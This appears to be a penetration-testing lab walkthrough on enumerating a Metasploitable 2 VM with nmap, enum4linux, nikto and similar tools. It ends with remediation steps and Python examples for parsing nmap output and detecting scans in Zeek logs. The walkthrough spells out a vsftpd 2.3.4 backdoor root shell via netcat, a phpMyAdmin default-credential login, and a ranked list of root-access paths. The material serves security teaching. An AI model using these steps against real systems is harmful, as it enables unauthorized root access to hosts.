Difficulty: Medium · Category: Enumeration · Time: ~35 min

Service Enumeration to Foothold

Enumerate an unknown box's services with nmap and targeted tools, identify the weak point, and plan the exploit.

↳ Based on the lesson: Scanning & Enumeration

Legal Use Only

Port scanning and service enumeration must only be performed on systems you own or have explicit written authorization to test. Scanning hosts on shared networks, ISP networks, or the public internet without authorization violates computer fraud laws in most jurisdictions. This lab targets Metasploitable 2 or a similar intentionally vulnerable VM on a private, isolated host-only network.

There's a box on your lab network. You know its IP and nothing else. Your job is to find out everything the machine is willing to tell you before you ever touch an exploit.

Scenario

You've been handed an IP address - 192.168.56.101 - and told it's in scope for a full internal penetration test. No documentation, no prior knowledge. Start from zero: discover which ports are open, identify the services and versions running on each, fingerprint the operating system, and determine which service is the weakest link. By the end, you'll have a prioritized list of attack paths.

Setup - target VM:

# Option A: Metasploitable 2 (the classic vulnerable lab VM)
# Download from SourceForge, import into VirtualBox or VMware
# Set the network adapter to Host-Only
# Default credentials: msfadmin / msfadmin (don't use these yet - enumerate first)
 
# Option B: Metasploitable 3 (more modern)
$ vagrant box add rapid7/metasploitable3-ub1404
$ vagrant init rapid7/metasploitable3-ub1404 && vagrant up
 
# Option C: Any HackTheBox or TryHackMe "Easy" machine
# (Use their VPN, they authorize enumeration within their platform)
 
# Verify target is reachable before starting:
$ ping -c 3 192.168.56.101

Your Objective

  1. Discover all open TCP ports on the target (full port range)
  2. Identify service names and version strings for each open port
  3. Fingerprint the operating system
  4. Run targeted enumeration tools against high-value services (FTP, SSH, HTTP, SMB)
  5. Identify the most likely initial access vector and document your attack plan

Hints

Hint 1 - scan strategy: fast then deep

A full-port scan (-p-) takes time but catches services on non-standard ports. The efficient workflow is: quick SYN scan first to find open ports fast, then a version-detection scan (-sV) only against the ports you found. Scanning all 65535 ports with -sV takes much longer than needed.

Hint 2 - nmap scripts for each service

nmap's -sC flag runs the default script set, which includes banners, version checks, and common vulnerability probes. For a specific service, use --script with a category or script name. nmap --script vuln runs all vulnerability-detection scripts - noisy but thorough on a lab box.

Hint 3 - targeted tools beat generic scanners

Once nmap tells you what's running, switch to service-specific tools: enum4linux for SMB/NetBIOS, nikto for HTTP, hydra for brute-forcing auth services, ftp command for anonymous FTP, ssh-audit for SSH configuration weaknesses. Each tool has context nmap lacks.

Walkthrough

Step 1: Fast TCP port discovery

Start with a quick SYN scan across all 65535 ports to find every open port without waiting for version detection:

Save that port list - you'll pass it to the version scan next.

Step 2: Version and OS detection on discovered ports

Run deep detection only against the ports you found:

Key findings from version output:

21/tcp   open  ftp        vsftpd 2.3.4
22/tcp   open  ssh        OpenSSH 4.7p1 Debian 8ubuntu1
23/tcp   open  telnet     Linux telnetd
80/tcp   open  http       Apache httpd 2.2.8 (Ubuntu DAV/2)
139/tcp  open  netbios    Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios    Samba smbd 3.0.20-Debian
3306/tcp open  mysql      MySQL 5.0.51a-3ubuntu5
5432/tcp open  postgresql PostgreSQL DB 8.3.0-8.3.7

vsftpd 2.3.4 and Samba 3.0.20 both have well-known remote code execution vulnerabilities - note these immediately.

Step 3: FTP enumeration - anonymous login and vsftpd backdoor

Note the vsftpd version: 2.3.4. This version contains a backdoor planted by an attacker who compromised the vsftpd distribution server in 2011. Sending :) in the username triggers it:

# vsftpd 2.3.4 backdoor - opens a shell on port 6200
$ nmap --script ftp-vsftpd-backdoor 192.168.56.101 -p 21
# If vulnerable: PORT 6200/tcp open  shell
$ nc 192.168.56.101 6200
# You now have a root shell

Step 4: SMB enumeration with enum4linux

The tmp share comment "oh noes!" is a hint - it's an open writable share. Samba 3.0.20 is also vulnerable to CVE-2007-2447 (username map script), a remote command injection that gives root.

# Test Samba usermap_script vulnerability (CVE-2007-2447)
$ nmap --script smb-vuln-cve2007-2447 -p 445 192.168.56.101

Step 5: HTTP enumeration with nikto and directory busting

Check for default credentials immediately on any admin panel found:

# Try phpMyAdmin default credentials
$ curl -s -c phpma.cookies -d "pma_username=root&pma_password=&server=1" \
  http://192.168.56.101/phpMyAdmin/ | grep -i "welcome\|error"

Step 6: Build the attack surface map

Summarize your findings into a prioritized target list:

# High confidence, known RCE:
# - vsftpd 2.3.4 (port 21)     - backdoor, triggers root shell on port 6200
# - Samba 3.0.20 (port 445)    - CVE-2007-2447, username map script RCE → root
# - Apache Tomcat 5.5 (8180)   - default manager creds, WAR file deployment
 
# High confidence, credential attacks:
# - MySQL 5.0 (port 3306)      - try root with empty password
# - PostgreSQL 8.3 (port 5432) - try postgres/postgres
# - VNC (port 5900)            - try empty password
# - Telnet (port 23)           - unencrypted, try msfadmin/msfadmin
 
# Good but slower paths:
# - SSH (port 22) OpenSSH 4.7  - outdated, check for weak creds
# - Web apps (port 80)         - DVWA/Mutillidae provide more SQLi/XSS practice

Solution

The efficient enumeration workflow:

# 1. Fast full-port discovery
sudo nmap -sS -p- --min-rate 5000 -T4 TARGET -oN ports.txt
 
# 2. Deep version+OS+scripts on discovered ports only
ports=$(grep "^[0-9]" ports.txt | cut -d/ -f1 | tr '\n' ',' | sed 's/,$//')
sudo nmap -sV -sC -O -p$ports TARGET -oN versions.txt
 
# 3. Service-specific tools for key ports
ftp TARGET                                    # anonymous login test
enum4linux -a TARGET                          # SMB/NetBIOS deep dive
nikto -h http://TARGET                        # web vulnerability scan
gobuster dir -u http://TARGET -w WORDLIST     # directory busting
 
# 4. Quick vulnerability scan
sudo nmap --script vuln -p21,445,8180 TARGET  # targeted vuln scripts
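
The two-phase workflow from Hint 1 and step 2 of this solution (fast -sS -p- scan, then -sV only on what was found) hinges on pulling the open ports cleanly out of the first -oN file. As an added Python example that is not part of the lab, the parser below reads nmap's normal output, keeps only rows whose STATE is exactly "open" (the grep '^[0-9]' pipeline above would also sweep in filtered or closed rows), and emits both the comma-separated -p list and a port-to-version table for the step 6 attack-surface map. Both scan excerpts are constructed sample data, not captured output.

```python
import re
from collections import namedtuple

# One port line of nmap's normal (-oN) output, e.g. "21/tcp  open  ftp  vsftpd 2.3.4".
# The VERSION text only appears after -sV; a plain -sS scan stops at the service name.
PORT_LINE = re.compile(r"^(\d{1,5})/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")
Service = namedtuple("Service", "port proto name version")  # version == "" if absent

def parse_open_ports(nmap_output):
    """Keep rows whose STATE is exactly 'open'. Rows marked 'filtered',
    'open|filtered' or 'closed' must not end up in the follow-up -p list."""
    found = []
    for line in nmap_output.splitlines():
        m = PORT_LINE.match(line.rstrip())
        if m and m.group(3) == "open":
            found.append(Service(int(m.group(1)), m.group(2),
                                 m.group(4), (m.group(5) or "").strip()))
    return sorted(found, key=lambda s: s.port)

def port_spec(services):
    """Comma-separated value for the follow-up scan's -p, e.g. '21,22,80,445'."""
    return ",".join(str(s.port) for s in services)

def version_table(services):
    """Map 'port/proto' to the version string (service name if nmap printed none)."""
    return {f"{s.port}/{s.proto}": s.version or s.name for s in services}

# Constructed -oN excerpt of the fast -sS -p- scan (sample data, not real output).
FAST_SCAN = """\
Nmap scan report for 192.168.56.101
Not shown: 65530 closed tcp ports (reset)
PORT     STATE    SERVICE
21/tcp   open     ftp
22/tcp   open     ssh
80/tcp   open     http
445/tcp  open     microsoft-ds
8009/tcp filtered ajp13
"""

# Constructed -oN excerpt of the follow-up -sV scan on the ports found above.
VERSION_SCAN = """\
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
80/tcp  open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
"""
```

Feed `port_spec(parse_open_ports(open("ports.txt").read()))` into `-p` for the second scan; the filtered 8009/tcp row in the sample is deliberately dropped.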

Top initial access path: vsftpd 2.3.4 backdoor (port 21) → sends :) in username → shell spawns on port 6200 → root access without credentials. The entire exploit fits in two commands.

Key principle: Enumeration is the multiplier. Ten minutes of thorough service fingerprinting reveals multiple distinct paths to compromise - a real attacker picks the easiest one. The vsftpd backdoor and Samba usermap_script vulnerability each give root in under a minute once identified.

Defend It

Remediation priorities from this scan

A box with this attack surface would never be on a production network, but the findings map directly to real hardening checklists.

Critical remediations in priority order:

# 1. Patch and update everything
#    vsftpd 2.3.4, Samba 3.0.20, OpenSSH 4.7 - all years past end-of-life
#    $ apt-get update && apt-get upgrade
 
# 2. Disable services you don't need
#    Telnet, rsh/rexec (512-514), rpcbind, IRC - all plaintext or legacy
#    $ systemctl disable telnet rsh rexec rpcbind inspircd
#    $ systemctl stop telnet rsh rexec rpcbind inspircd
 
# 3. Close the firewall to everything except required ports
#    $ ufw default deny incoming
#    $ ufw allow 22/tcp   # SSH only for admin access
#    $ ufw allow 443/tcp  # HTTPS for web apps
#    $ ufw enable
 
# 4. Remove or secure default credentials everywhere
#    MySQL: ALTER USER 'root'@'localhost' IDENTIFIED BY 'strongpassword';
#    PostgreSQL: change postgres user password
#    phpMyAdmin: restrict to localhost only, require strong auth
 
# 5. Change authentication method for SSH
#    Disable password auth, require key-based auth only
#    In /etc/ssh/sshd_config: PasswordAuthentication no

Detection: A scan like this generates significant traffic. Network intrusion detection systems (Snort, Zeek) will alert on nmap's fingerprinting probes. In a real engagement, coordinate with the blue team and agree on whether to scan with source IP whitelisting or full noise to test detection capabilities.
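
To make the detection note concrete, here is an added Python example (not part of the lab) that applies the simplest port-scan heuristic to Zeek's conn.log: one source touching many distinct destination ports on one host inside a short time window, which is exactly the footprint the -sS -p- sweep in step 1 leaves. The log excerpt is constructed sample data using Zeek's real column names; the 10-second window and 5-port threshold are assumed starting values to tune per network.

```python
from collections import defaultdict

# Constructed Zeek conn.log excerpt (sample data, not a real capture). Column
# names are a subset of Zeek's real ones, selected through the #fields header
# the way Zeek's own tools do. Connection states: S0 = SYN seen, no reply;
# REJ = attempt rejected; RSTO = established, then reset by the originator;
# SF = normal establishment and termination.
SAMPLE_CONN_LOG = "\n".join([
    "#fields\tts\tuid\tid.orig_h\tid.orig_p\tid.resp_h\tid.resp_p\tproto\tconn_state",
    "1700000000.10\tC1\t192.168.56.102\t40001\t192.168.56.101\t21\ttcp\tRSTO",
    "1700000000.11\tC2\t192.168.56.102\t40002\t192.168.56.101\t22\ttcp\tRSTO",
    "1700000000.12\tC3\t192.168.56.102\t40003\t192.168.56.101\t23\ttcp\tRSTO",
    "1700000000.13\tC4\t192.168.56.102\t40004\t192.168.56.101\t80\ttcp\tRSTO",
    "1700000000.14\tC5\t192.168.56.102\t40005\t192.168.56.101\t139\ttcp\tRSTO",
    "1700000000.15\tC6\t192.168.56.102\t40006\t192.168.56.101\t445\ttcp\tRSTO",
    "1700000000.16\tC7\t192.168.56.102\t40007\t192.168.56.101\t8180\ttcp\tS0",
    "1700000000.17\tC8\t192.168.56.102\t40008\t192.168.56.101\t8180\ttcp\tS0",  # retry
    "1700000100.00\tC9\t192.168.56.1\t51000\t192.168.56.101\t80\ttcp\tSF",
    "1700000160.00\tCa\t192.168.56.1\t51001\t192.168.56.101\t22\ttcp\tSF",
    "1700000400.00\tCb\t192.168.56.1\t51002\t192.168.56.101\t80\ttcp\tSF",
])

def parse_conn_log(text):
    """Yield one dict per record, naming columns from the #fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#fields"):
            fields = line.split("\t")[1:]
        elif line and not line.startswith("#") and fields:
            yield dict(zip(fields, line.split("\t")))

def find_port_scans(text, window=10.0, min_ports=5):
    """Return {(src, dst): distinct_ports} for every source that reached at least
    min_ports distinct destination ports on one host within `window` seconds."""
    by_pair = defaultdict(list)
    for rec in parse_conn_log(text):
        by_pair[(rec["id.orig_h"], rec["id.resp_h"])].append((float(rec["ts"]), int(rec["id.resp_p"])))
    hits = {}
    for pair, events in by_pair.items():
        events.sort()  # sliding window over time-ordered (ts, port) pairs
        best = 0
        for i, (t0, _) in enumerate(events):
            ports = {p for t, p in events[i:] if t - t0 <= window}
            best = max(best, len(ports))
        if best >= min_ports:
            hits[pair] = best
    return hits
```

The retry to 8180 counts once, and the admin host's three ordinary connections spread over minutes never exceed one port per window, so only the scanner is reported.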